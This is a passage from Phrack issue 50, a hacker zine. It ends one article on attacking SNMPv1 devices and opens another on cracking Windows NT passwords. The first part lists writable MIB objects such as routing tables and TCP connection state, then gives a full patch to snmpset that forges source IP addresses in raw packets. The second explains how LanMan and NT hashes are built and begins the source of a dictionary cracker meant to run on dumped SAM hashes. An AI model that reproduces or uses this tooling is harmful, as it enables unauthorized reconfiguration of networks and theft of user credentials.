We have all the elements we need to remotely configure the network. We have
a community name, we have the ability to forge the manager (the SNMP client)
address. All we need to figure out is what we can modify. This really
varies. There are a set of defaults that almost every SNMP'able machine
will have. In addition to these, though, are the 'enterprise' MIB's, which
define vendor specific SNMP tables and fields. There's really too much to go
into here. Check out ftp://ftp.cisco.com/ or ftp://ftp.ascend.com/ , for
example...most vendors make their MIB's easy to find. Cisco's web page also
has a great introduction to their enterprise MIB's, which detail all the
differences between different IOS release levels and whatnot.
IN the meantime, though, check out the following as fun places to begin:
system.sysContact \
system.sysName |- really sorta pointless to change, but hey...whatever.
system.sysLocation /
interfaces.ifTable.ifAdminStatus.n (where n is a number, starting at 0)
at.atTable.atIfIndex.n
at.atTable.atPhysAddress.n
at.atTable.atNetAddress.n
ip.ipForwarding
ip.ipDefaultTTL
ip.ipRouteTable.* (there's tons of stuff in this table)
ip.ipNetToMediaTable.* (same as above)
tcp.tcpConnState.* (only setable to 12, which deletes the TCB)
and so on. If you have a copy of TCP/IP Illustrated Vol. 1, the SNMP chapter
will give you a set of tables with the types of all these values. If you don't
have TCP/IP Illustrated, get off your computer and go buy it.
Remember, people don't really like it too much when you muck with their
equipment. Act responsibly.
And to the admins reading this: TURN OFF SNMPv1! Think about it. Any time
you allow control of you network via the network in a manner as unsafe as
how SNMPv1 does it, you're creating more problems for yourself. Realizing
its all about acceptable risks, realize this isn't one. Go investigate
alternate network management software. Realize, however, there are always
going to be problems. (I don't recommend SNMPv2, however...a few months from
now when I release my SNMPv2 article and tools, you'll be glad you are not
running it)
Resources:
The software I use is based on the UCD modifications to the CMU SNMP
distribution. It is available at:
ftp://ftp.ece.ucdavis.edu/pub/snmp/ucd-snmp-3.1.3.tar.gz
Following this article there is a patch, which are the modifications to
the snmplib to support address spoofing, and modifications to the 'snmpset'
app to support them. The patch is only known to work under Solaris, though
it should take only minor changes to move it to any other platform.
ftp.cisco.com/pub/mibs and ftp.ascend.com/pub/Software-Releases/SNMP/MIBS
contain the enterprise MIBS for a variety of different pieces of hardware.
www.cisco.com/univercd/ contains tons of info on a variety of different
Cisco hardware and software, including great references on SNMP under IOS.
http://www.cs.tu-bs.de/ibr/cgi-bin/sbrowser.cgi
has a MIB browser, which allows you to use your favorite web client to
peruse the standard as well as vendor MIBs on thier site.
RFC's! Yes! All of them. Go to http://www.internic.net/ds/dspg0intdoc.html
and read them. Do a search for SNMP and you'll get back tons of hits.
They're a little...hrm...terse at times, but these are the defacto definitions
of SNMP. Skimming them will give you more info than you can imagine.
<++> SNMPv1/snmp.diff
*** apps/snmpset.c Mon Jan 20 09:07:22 1997
-- apps/snmpset.c Tue Apr 8 17:21:03 1997
***************
*** 77,83 ****
void
usage(){
! fprintf(stderr, "Usage: snmpset -v 1 [-q] hostname community [objectID typ
e value]+ or:\n");
fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname noAuth [objectID type
value]+ or:\n");
fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname srcParty dstParty con
text [oID type val]+\n");
fprintf(stderr, "\twhere type is one of: i, s, x, d, n, o, t, a\n");
--- 77,83 ----
void
usage(){
! fprintf(stderr, "Usage: snmpset -v 1 [-e fakeip] [-q] hostname community [
objectID type value]+ or:\n");
fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname noAuth [objectID type
value]+ or:\n");
fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname srcParty dstParty con
text [oID type val]+\n");
fprintf(stderr, "\twhere type is one of: i, s, x, d, n, o, t, a\n");
***************
*** 85,90 ****
--- 85,93 ----
fprintf(stderr, "\t\tn: NULLOBJ, o: OBJID, t: TIMETICKS, a: IPADDRESS\n");
}
+ extern char *fakeaddr;
+ extern int nastyflag;
+
int
main(argc, argv)
int argc;
***************
*** 152,158 ****
usage();
exit(1);
}
! break;
default:
printf("invalid option: -%c\n", argv[arg][1]);
break;
--- 155,165 ----
usage();
exit(1);
}
! break;
! case 'e':
! fakeaddr = argv[++arg];
! nastyflag = 1;
! break;
default:
printf("invalid option: -%c\n", argv[arg][1]);
break;
*** snmplib/snmp_api.c Mon Jan 20 10:43:20 1997
-- snmplib/snmp_api.c Tue Apr 8 17:21:08 1997
***************
*** 58,63 ****
--- 58,71 ----
#include
#endif
#include
+
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+
#include
#include "asn1.h"
#include "snmp.h"
***************
*** 847,852 ****
--- 855,882 ----
}
return 0;
}
+ /* EVIL STUFF in_cksum for forged ip header */
+ unsigned short in_cksum(addr, len)
+ u_short *addr;
+ int len;
+ {
+ register int nleft = len;
+ register u_short *w = addr;
+ register int sum = 0;
+ u_short answer = 0;
+ while (nleft > 1) {
+ sum += *w++;
+ nleft -= 2;
+ }
+ if (nleft == 1) {
+ *(u_char *)(&answer) = *(u_char *)w ;
+ sum += answer;
+ }
+ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
+ sum += (sum >> 16); /* add carry */
+ answer = ~sum; /* truncate to 16 bits */
+ return(answer);
+ }
/*
* Sends the input pdu on the session after calling snmp_build to create
***************
*** 857,862 ****
--- 887,894 ----
* On any error, 0 is returned.
* The pdu is freed by snmp_send() unless a failure occured.
*/
+ char *fakeaddr = NULL;
+ int nastyflag = 0;
int
snmp_send(session, pdu)
struct snmp_session *session;
***************
*** 1013,1026 ****
xdump(packet, length, "");
printf("\n\n");
}
!
! if (sendto(isp->sd, (char *)packet, length, 0,
! (struct sockaddr *)&pdu->address, sizeof(pdu->address)) < 0){
! perror("sendto");
! snmp_errno = SNMPERR_GENERR;
! return 0;
! }
/* gettimeofday(&tv, (struct timezone *)0); */
tv = Now;
if (pdu->command == GET_REQ_MSG || pdu->command == GETNEXT_REQ_MSG
--- 1045,1099 ----
xdump(packet, length, "");
printf("\n\n");
}
+ if(nastyflag == 1)
+ {
+ struct ip *ip_hdr;
+ struct udphdr *udp_hdr;
+ char *payload;
+ int socky;
+ struct sockaddr_in dest;
+ payload = (char*) malloc
+ (sizeof(struct ip)
+ + (sizeof(struct udphdr)) + length);
+ ip_hdr = (struct ip*) payload;
+ ip_hdr->ip_v=4;
+ ip_hdr->ip_hl=5;
+ ip_hdr->ip_tos=0;
+ ip_hdr->ip_off=0;
+ ip_hdr->ip_id=htons(1+rand()%1000);
+ ip_hdr->ip_ttl=255;
+ ip_hdr->ip_p=IPPROTO_UDP;
+ ip_hdr->ip_len = htons(sizeof(struct ip) + sizeof(struct udphdr) + len
gth);
+ ip_hdr->ip_src.s_addr = inet_addr(fakeaddr);
+ ip_hdr->ip_dst = pdu->address.sin_addr;
+ ip_hdr->ip_sum = in_cksum(&ip_hdr,sizeof(ip_hdr));
+
+ udp_hdr = (struct udphdr *) (payload + sizeof(struct ip));
+ udp_hdr->uh_sport = htons(10000+rand()%20000);
+ udp_hdr->uh_dport = htons(161);
+ udp_hdr->uh_ulen = htons(length + sizeof(struct udphdr));
+ udp_hdr->uh_sum = 0;
+ memcpy(payload + sizeof(struct udphdr)+sizeof(struct ip),packet,length
);
+ dest.sin_family = AF_INET;
+ dest.sin_port = htons(161);
+ dest.sin_addr = pdu->address.sin_addr;
+ socky = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
+ fprintf(stderr,"Payload size:%d sent\n",sendto(socky,payload,28+length
,0,
+ (struct sockaddr *)&dest,sizeof(dest)));
+ exit(0);
! }
! else
! {
! if (sendto(isp->sd, (char *)packet, length, 0,
! (struct sockaddr *)&pdu->address,
! sizeof(pdu->address)) < 0)
! {
! perror("sendto");
! snmp_errno = SNMPERR_GENERR;
! return 0;
! }
! }
/* gettimeofday(&tv, (struct timezone *)0); */
tv = Now;
if (pdu->command == GET_REQ_MSG || pdu->command == GETNEXT_REQ_MSG
<--> SNMPv1/snmp.diff
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
8 of 16
Cracking NT Passwords
by Nihil
Recently a breakthrough was made by one of the Samba team members, Jeremy
Allison, that allows an administrator to dump the one-way functions (OWF)
of the passwords for each user from the Security Account Manager (SAM)
database, which is similar to a shadowed password file in *nix terms. The
program Jeremy wrote is called PWDUMP, and the source can be obtained from
the Samba team's FTP server. This is very useful for administrators of
Samba servers, for it allows them to easily replicate the user database
from Windows NT machines on Samba servers. It also helps system
administrators and crackers in another way: dictionary attacks against
user's passwords. There is more, but I will save that for later.
Windows NT stores two hashes of a user's password in general: the LanMan
compatible OWF and the NT compatible OWF. The LanMan OWF is generated by
limiting the user's password to 14 characters (padding with NULLs if it is
shorter), converting all alpha characters to uppercase, breaking the 14
characters (single byte OEM character set) into two 7 byte blocks,
expanding each 7 byte block into an 8 byte DES key with parity, and
encrypting a known string, {0xAA,0xD3,0xB4,0x35,0xB5,0x14,0x4,0xEE}, with
each of the two keys and concatenating the results. The NT OWF is created
by taking up to 128 characters of the user's password, converting it to
unicode (a two byte character set used heavily in NT), and taking the MD4
hash of the string. In practice the NT password is limited to 14
characters by the GUI, though it can be set programmatically to something
greater in length.
The demonstration code presented in this article does dictionary attacks
against the NT OWF in an attempt to recover the NT password, for this is
what one needs to actually logon to the console. It should be noted that
it is much easier to brute force the LanMan password, but it is only used
in network authentication. If you have the skillz, cracking the LanMan
password can take you a long way towards cracking the NT password more
efficently, but that is left as an exercise for the reader ;>
For those readers wit da network programming skillz, the hashes themselves
are enough to comprimise a NT machine from the network. This is so because
the authentication protocol used in Windows NT relies on proof of the OWF
of the password, not the password itself. This is a whole other can of
worms we won't get into here.
The code itself is simple and pretty brain dead. Some Samba source was
used to speed up development time, and I would like to give thanks to the
Samba team for all their effort. Through the use of, and study of, Samba
several interesting security weaknesses in Windows NT have been uncovered.
This was not the intent of the Samba team, and really should be viewed as
what it is - some lame security implementations on Microsoft's part. Hey,
what do you expect from the people that brought you full featured (not in a
good way, mind you) macro languages in productivity applications?
You will need md4.c, md4.h, and byteorder.h from the Samba source
distribution inorder to compile the code here. It has been compiled and
tested using Visual C++ 4.2 on Windows NT 4.0, but I see no reason why it
should not compile and run on your favorite *nix platform. To truly be
useful, some code should be added to try permutations of the dictionary
entry and user name, but again, that is up to the reader.
One note: You will want to remove 3 lines from md4.c: the #ifdef SMB_PASSWD
at the top and corresponding #else and #endif at the bottom...
Here ya go:
<++> NTPWC/ntpwc.c
/*
* (C) Nihil 1997. All rights reserved. A Guild Production.
*
* This program is free for commercial and non-commercial use.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted.
*
* THIS SOFTWARE IS PROVIDED BY NIHIL ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
/* Samba is covered by the GNU GENERAL PUBLIC LICENSE Version 2, June 1991 */
/* dictionary based NT password cracker. This is a temporary
* solution until I get some time to do something more
* intelligent. The input to this program is the output of
* Jeremy Allison's PWDUMP.EXE which reads the NT and LANMAN
* OWF passwords out of the NT registry and a crack style
* dictionary file. The output of PWDUMP looks
* a bit like UNIX passwd files with colon delimited fields.
*/
#include